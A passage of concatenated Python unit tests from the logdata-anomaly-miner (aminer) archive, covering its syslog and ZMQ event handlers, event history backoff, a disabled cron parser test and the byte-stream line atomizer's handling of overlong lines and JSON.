self.assertRaises(Exception, sweh.receive_event, test, new_val, [log_atom.raw_data, log_atom.raw_data], log_atom.get_parser_match(), self) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 7) self.output_event_handlers = [sweh] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 11) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 11) self.output_event_handlers = [sweh] self.analysis_context.suppress_detector_list = [] self.assertTrue(sweh.receive_event(test, new_val, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) string = self.extract_syslog_string() self.assertEqual(string.count("\n"), 15) def extract_syslog_string(self): string = "" sleep(0.2) with open("/var/log/syslog") as search: for line in search: line = line.rstrip() # remove "\n" at end of line if "aminer[" + str(os.getpid()) + "]" in line: line = line.split("]: ") string += (line[1]) + "\n" return string def test2validate_parameters(self): """Test all initialization parameters for the event handler. 
Input parameters must be validated in the class.""" self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, ["default"]) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, None) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, b"Default") self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, True) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, 123) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, 123.3) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, {"id": "Default"}) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, ()) self.assertRaises(TypeError, SyslogWriterEventHandler, self.analysis_context, set()) self.assertRaises(ValueError, SyslogWriterEventHandler, self.analysis_context, "") SyslogWriterEventHandler(self.analysis_context, "aminer") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/UtilsTest.py000066400000000000000000000155201500476301700256010ustar00rootroot00000000000000import unittest from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory from time import time from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class UtilsTest(TestBase): """Unittests for the Utils.""" def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" pid = b" pid=" test = "Test.%s" % self.__class__.__name__ message = "New value for paths match/s1, match/s2: b' pid=' " # In this test case multiple events are received by the VolatileLogarithmicBackoffEventHistory. 
vlbeh = VolatileLogarithmicBackoffEventHistory(10) match_context = DummyMatchContext(pid) fdme = DummyFixedDataModelElement("s1", pid) match_element = fdme.get_match_element("match", match_context) t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(vlbeh.get_history(), [(0, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) self.assertEqual(vlbeh.get_history(), [(0, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self), (1, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)]) # In this test case no events are received by the VolatileLogarithmicBackoffEventHistory. vlbeh = VolatileLogarithmicBackoffEventHistory(10) self.assertEqual(vlbeh.get_history(), []) # In this test case the EventHandler receives no logAtom from the test class and the output should not contain the log time. vlbeh = VolatileLogarithmicBackoffEventHistory(10) t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) self.assertEqual(vlbeh.get_history(), [(0, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]) # In this test case more events than the VolatileLogarithmicBackoffEventHistory can handle are received (max items overflow). 
deviation = 0.05 size = 100000 msg = "%s=%f is not between %f and %f" t = time() log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, self) first = 0 second = 0 third = 0 fourth = 0 vlbeh = VolatileLogarithmicBackoffEventHistory(2) for i in range(size): vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) vlbeh.receive_event(test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) history = vlbeh.get_history() shift = i * 5 if history == [(0 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: first += 1 elif history == [(1 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), ( 4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: second += 1 elif history == [(2 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), ( 4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: third += 1 elif history == [(3 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), ( 4 + shift, test, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: fourth += 1 val = 0.5 * 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) 
self.assertTrue(minimum <= first <= maximum, msg % ("first", first, minimum, maximum)) val = 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= second <= maximum, msg % ("second", second, minimum, maximum)) val = 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= third <= maximum, msg % ("third", third, minimum, maximum)) val = 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= fourth <= maximum, msg % ("fourth", fourth, minimum, maximum)) def test2validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, "") self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, b"") self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, ["default"]) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, None) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, True) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, 123.3) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, {"id": "Default"}) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, ()) self.assertRaises(TypeError, VolatileLogarithmicBackoffEventHistory, set()) self.assertRaises(ValueError, VolatileLogarithmicBackoffEventHistory, 0) self.assertRaises(ValueError, VolatileLogarithmicBackoffEventHistory, -1) VolatileLogarithmicBackoffEventHistory(1) VolatileLogarithmicBackoffEventHistory(100) VolatileLogarithmicBackoffEventHistory(1000) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/ZmqEventHandlerTest.py000066400000000000000000000166121500476301700275530ustar00rootroot00000000000000import time import zmq from 
aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.events.ZmqEventHandler import ZmqEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext class ZmqEventHandlerTest(TestBase): """Unittests for the ZmqEventHandler.""" resource_name = b"testresource" sub_url = "tcp://localhost:5555" pub_url = "tcp://*:5555" topic = "test_topic" persistence_id = "Default" match_context = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") match_element = fdme.get_match_element("", match_context) @classmethod def setUpClass(cls): """Start a ZmqConsumer.""" cls.context = zmq.Context() cls.consumer = cls.context.socket(zmq.SUB) cls.consumer.setsockopt(zmq.RCVTIMEO, 500) cls.consumer.connect(cls.sub_url) cls.consumer.setsockopt_string(zmq.SUBSCRIBE, cls.topic) @classmethod def tearDownClass(cls): """Shutdown the ZmqConsumer.""" cls.consumer.close() cls.context.destroy() def test1receive_event(self): """Test if events are processed correctly and that edge cases are caught in exceptions.""" description = "jsonConverterHandlerDescription" test_detector = "Analysis.TestDetector" event_message = "An event happened!" 
sorted_log_lines = ["Event happened at /path/ 5 times.", "", "", "", ""] exp = '{\n "AnalysisComponent": {\n "AnalysisComponentIdentifier": 0,\n "AnalysisComponentType": "%s",\n ' \ '"AnalysisComponentName": "%s",\n "Message": "%s",\n "PersistenceFileName": "%s",\n "AffectedParserPaths": [\n' \ ' "test/path/1",\n "test/path/2"\n ],\n "LogResource": "testresource"\n },\n "LogData": {\n ' \ '"RawLogData": [\n " pid="\n ],\n "Timestamps": [\n %s\n ],\n "DetectionTimestamp": %s,\n "LogLinesCount": 5\n }%s\n}\n' jch = JsonConverterHandler([self.stream_printer_event_handler], self.analysis_context) t = round(time.time(), 3) log_atom = LogAtom(self.fdme.data, ParserMatch(self.match_element), t, self) self.analysis_context.register_component(self, description) event_data = {"AnalysisComponent": {"AffectedParserPaths": ["test/path/1", "test/path/2"]}} jch.receive_event(test_detector, event_message, sorted_log_lines, event_data, log_atom, self) output = self.output_stream.getvalue() zeh = ZmqEventHandler(self.analysis_context, self.topic, self.pub_url) self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) topic = self.consumer.recv_string() self.assertEqual(self.topic, topic) val = self.consumer.recv_string() if val.endswith("\n\n"): val = val[:-1] detection_timestamp = None for line in val.split('\n'): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") break self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # test output_event_handlers self.output_event_handlers = [] self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(zmq.error.Again, self.consumer.recv_string) self.output_event_handlers = [zeh] self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) topic = 
self.consumer.recv_string() self.assertEqual(self.topic, topic) val = self.consumer.recv_string() if val.endswith("\n\n"): val = val[:-1] detection_timestamp = None for line in val.split("\n"): if "DetectionTimestamp" in line: detection_timestamp = line.split(":")[1].strip(" ,") break self.assertEqual(val, exp % (self.__class__.__name__, description, event_message, self.persistence_id, round(t, 2), detection_timestamp, "")) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] self.assertTrue(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) self.assertRaises(zmq.error.Again, self.consumer.recv_string) self.output_event_handlers = [zeh] self.analysis_context.suppress_detector_list = [] zeh.producer.close() self.assertFalse(zeh.receive_event(test_detector, event_message, sorted_log_lines, output, log_atom, self)) zeh.context.destroy() def test2validate_parameters(self): """Test all initialization parameters for the event handler. 
Input parameters must be validated in the class.""" t = round(time.time(), 3) log_atom = LogAtom(self.fdme.data, ParserMatch(self.match_element), t, self) zmq_event_handler = ZmqEventHandler(self.analysis_context, self.topic, self.pub_url) self.assertFalse(zmq_event_handler.receive_event("test_detector", "event_message", ["loglines", ""], 123, log_atom, self)) zmq_event_handler.producer.close() zmq_event_handler.context.destroy() self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, ["default"], self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, None, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, b"Default", self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, True, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, 123, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, 123.3, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, {"id": "Default"}, self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, (), self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, set(), self.pub_url) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, None) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, True) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, 123) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, 123.3) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, {"id": "Default"}) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, ()) self.assertRaises(TypeError, ZmqEventHandler, self.analysis_context, self.topic, set()) self.assertRaises(ValueError, ZmqEventHandler, self.analysis_context, self.topic, "") self.assertRaises(ValueError, 
ZmqEventHandler, self.analysis_context, self.topic, b"") zmq_event_handler = ZmqEventHandler(self.analysis_context, self.topic, b"tcp://*:5555") zmq_event_handler.producer.close() zmq_event_handler.context.destroy() if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/__init__.py000066400000000000000000000000001500476301700253630ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/generic/000077500000000000000000000000001500476301700233745ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/generic/CronParsingModelTest.py000066400000000000000000000201501500476301700300120ustar00rootroot00000000000000"""package not used. import unittest from aminer.generic import CronParsingModel from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase ''' These testcases are testing the CronParsingModel with the Basis Path Testing method. The Modified Condition / Decisision Coverage is also accomplished, because the conditions are all simple, which means it is tested if the path is reached. The used paths can be seen in the provided flowchart. The child elements of the CronParsingModel could be tested, but they are assumed to be working as intended, because there should be individual test cases for every parser model. 
''' class CronParsingModelTest(TestBase): ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 ''' def test1(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: (root) CMD ping 8.8.8.8', self.cronParsingModel.getMatchElement('stdExec', self.matchContext).getMatchString()) ''' 1 -> 18 -> 33 ''' def test2(self): self.matchContext = MatchContext(b'systemd[1]: Started Daily apt download activities.') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 19 -> 33 ''' def test3(self): self.matchContext = MatchContext(b'CRON[ 25537 ]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 20 -> 33 ''' def test4(self): self.matchContext = MatchContext(b'CRON[25537]:(root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 17 ''' def test5(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session closed for user root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session closed for user root', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 21 -> 33 ''' def test6(self): 
self.matchContext = MatchContext(b'CRON[25537]: CRON info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 10 -> 21 -> 33 ''' def test7(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON;) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 11 -> 21 -> 33 ''' def test8(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 12 -> 21 -> 33 ''' def test9(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 22 -> 33 ''' def test10(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session changed for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 23 -> 33 ''' def test11(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 24 -> 33 ''' def test12(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user /usr/root') self.cronParsingModel = 
CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 25 -> 33 Should this case return a MatchElement? It could be an anomaly if a session is opened by another user than root. ''' def test13(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user user by (uid=2)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 32 ''' def test14(self): self.matchContext = MatchContext(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)', self.cronParsingModel.getMatchElement('low', self.matchContext).getMatchString()) ''' 1 -> 18 -> 26 -> 34 ''' def test15(self): self.matchContext = MatchContext(b'cron[ 25537 ]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 35 ''' def test16(self): self.matchContext = MatchContext(b'cron[25537]:(*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 36 The DelimitedDataModelElement should only return a MatchElement if at least one byte is between the start and the delimeter. 
''' def test17(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 37 ''' def test18(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD /var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 38 ''' def test19(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD ()') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 39 ''' def test20(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) if __name__ == "__main__": unittest.main() """ logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/generic/__init__.py000066400000000000000000000000001500476301700254730ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/000077500000000000000000000000001500476301700231175ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/ByteStreamLineAtomizerTest.py000066400000000000000000000630611500476301700307410ustar00rootroot00000000000000import unittest from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis import AtomFilters from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler from aminer.parsing.XmlModelElement import XmlModelElement from 
aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement import sys from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyNumberModelElement class ByteStreamLineAtomizerTest(TestBase): """Unittests for the ByteStreamLineAtomizer.""" def test1consume_data(self): """ Test the main functionality of the ByteStreamLineAtomizer by running the consume_data method. All other methods are called by the consume_data method and are not meant to be private methods of the class. """ data = b"fixed data" overlong = "Overlong line detected (1 lines)\n fixed data\n\n" start_overlong = "Start of overlong line detected (1 lines)\n fixed data\n\n" overlong_end = "Overlong line terminated by end of stream (1 lines)\n fixed data\n\n" output = "New path(s) detected\nNewMatchPathDetector: \"None\" (1 lines)\n ['/fixed']\n\n" unparsed = "Unparsed atom received\nSimpleUnparsedAtomHandler: \"None\" (1 lines)\n no match\n\n" incomplete = "Incomplete last line (1 lines)\n fixed data\n\n" fdme = DummyFixedDataModelElement("fixed", data) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) atom_filter = AtomFilters.SubhandlerFilter(None) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) atom_filter.add_handler(nmpd) # line < max_line_length and log atom matches bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 65536, []) line = data + b"\n" self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertIsNone(bsla.last_unconsumed_log_atom) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, []) self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertEqual(self.output_stream.getvalue(), output) self.reset_output_stream() 
self.assertIsNone(bsla.last_unconsumed_log_atom) # line < max_line_length and no match no_match = b" no match\n" self.assertEqual(bsla.consume_data(no_match, False), len(no_match)) self.assertEqual(self.output_stream.getvalue(), unparsed) self.reset_output_stream() self.assertIsNone(bsla.last_unconsumed_log_atom) # line > max_line_length and log atom matches bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 5, []) self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertEqual(self.output_stream.getvalue(), overlong) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 5, []) self.assertEqual(bsla.consume_data(data, False), len(data)) self.assertEqual(self.output_stream.getvalue(), start_overlong) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 5, []) self.assertEqual(bsla.consume_data(data, True), len(data)) self.assertEqual(self.output_stream.getvalue(), start_overlong + overlong_end) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, []) self.assertEqual(bsla.consume_data(data, True), len(data)) self.assertEqual(self.output_stream.getvalue(), incomplete) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() # use_real_time bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, [], use_real_time=True) self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertEqual(self.output_stream.getvalue().split(" ", 2)[-1], output) # skip datetime self.reset_output_stream() self.assertIsNone(bsla.last_unconsumed_log_atom) def test2consume_data_json(self): """ Test the functionality of the ByteStreamLineAtomizer 
on json data. Correct parsing of json data using a state machine is tested in the JsonStateMachineTest. """ # line < max_line_length data = b"fixed data" fdme = DummyFixedDataModelElement("fixed", data) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) atom_filter = AtomFilters.SubhandlerFilter(None) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) atom_filter.add_handler(nmpd) json_data = b'{\n\t"a": 1,\n\t"b": {"x": 2}}' data = b"some log line." bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, [], json_format=True) self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) # this is no valid json and should process only data until the last \n self.assertEqual(bsla.consume_data(data + json_data + data, False), len(data) + json_data.rfind(b"\n") + 1) json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d": 3}' self.assertEqual(bsla.consume_data(json_data, False), len(json_data)) self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}' self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) self.assertEqual(bsla.consume_data(data + json_data, False), len(data) + json_data.rfind(b"\n") + 1) # even when the first json data gets invalidated, the second one starts after an empty line and is therefore valid until the end. 
json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n\n{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}' self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) self.assertEqual(bsla.consume_data(data + json_data + data, False), len(data) + len(json_data)) # this is an incomplete json, but it still can be valid. json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d' self.assertEqual(bsla.consume_data(json_data, False), json_data.rfind(b"\n") + 1) # this is an incomplete json and the end can not be valid. json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, d' self.assertEqual(bsla.consume_data(json_data, False), json_data.rfind(b"\n") + 1) self.reset_output_stream() # line > max_line_length json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n{\n"a": 1,\n\t"b": {"c": 2},"d": 3}\n' json2 = b'{"a": 1,"b": {"c": 2},"d": 3}{"a": 1,"b": {"c": 2},"d": 3' bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 25, [], json_format=True) self.assertEqual(bsla.consume_data(json_data, False), json_data.rfind(b'\n') + 1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(bsla.consume_data(json_data, True), len(json_data)) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(bsla.consume_data(json_data, False), len(json_data)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(bsla.consume_data(json_data, True), len(json_data)) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 25, [], json_format=True) self.assertEqual(bsla.consume_data(json2, True), len(json2)) self.assertEqual(self.output_stream.getvalue(), 'Overlong line terminated by end of stream (1 lines)\n {"a": 1,"b": {"c": 2},"d":' ' 3}{"a": 1,"b": {"c": 2},"d": 3\n\n') 
